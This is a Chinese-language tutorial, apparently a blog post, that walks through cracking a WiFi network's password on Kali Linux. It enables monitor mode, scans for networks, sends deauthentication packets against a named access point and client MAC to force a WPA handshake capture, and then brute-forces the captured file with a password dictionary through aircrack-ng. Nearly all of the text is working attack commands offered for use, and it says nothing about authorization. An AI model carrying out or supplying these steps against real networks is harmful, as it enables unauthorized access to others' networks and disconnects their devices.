1、插入无线网卡(要免驱版的无线网卡,否则kali不识别)

2、检测无线网卡是否生效
在kali里输入ifconfig,查看有没有wlan0这个网卡。没有的话则表示网卡未安装成功或这个网卡不支持kali

输入airmon-ng查看是否支持监听模式

输入airmon-ng start wlan0激活监听模式

ifconfig查看当前监听的网卡名称。比如wlan0mon
输入airodump-ng wlan0mon扫描周边的无线信号,搜索到后按ctrl+c停止搜索

记下要破解的无线的BSSID和CH(频段)

输入airodump-ng -c 频段 --bssid BSSID -w 保存的位置 wlan0dump。如:

airodump-ng -c 6 --bssid 20:DA:22:B2:CE:18 -w /home/kali/Desktop/ wlan0mon


这里也能看到已经连接到这个WiFi的设备的mac地址:

但是这种抓包时间比较长,可以主动ACK攻击把设备踢下线,让其自动重新登陆,这样就可以抓到握手包了

在扫描的窗口不要关了,新开一个窗口,输入

#aireplay-ng -0 10 -a BSSID -c MAC地址 wlan0dump
aireplay-ng -0 10 -a 20:DA:22:B2:E4:10 -c CE:4E:2E:66:44:A4 wlan0mon
#其中0表示通知设备断开连接
#10表示攻击次数
#-a后面写要破解的BSSID
#-c后面是要踢下线的设备mac

这样就对这个设备发起ACK攻击了


注意,在第一个窗口,如果出现handshake提示则表示抓成功了

同时在目录下生成了一些握手包


我们只需要关注其中的cap文件即可

暴力破解

密码字典在文章配套的文档目录下
开始暴力破解

aircrack-ng -w /home/kali/desktop/wifi-password.txt -b BSSID /home/kali/desktop/1-01.cap
#其中-w后面是密码路径,-b是BSSID地址,cap文件是刚才抓到的包

按回车后,就开始暴力破解了

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。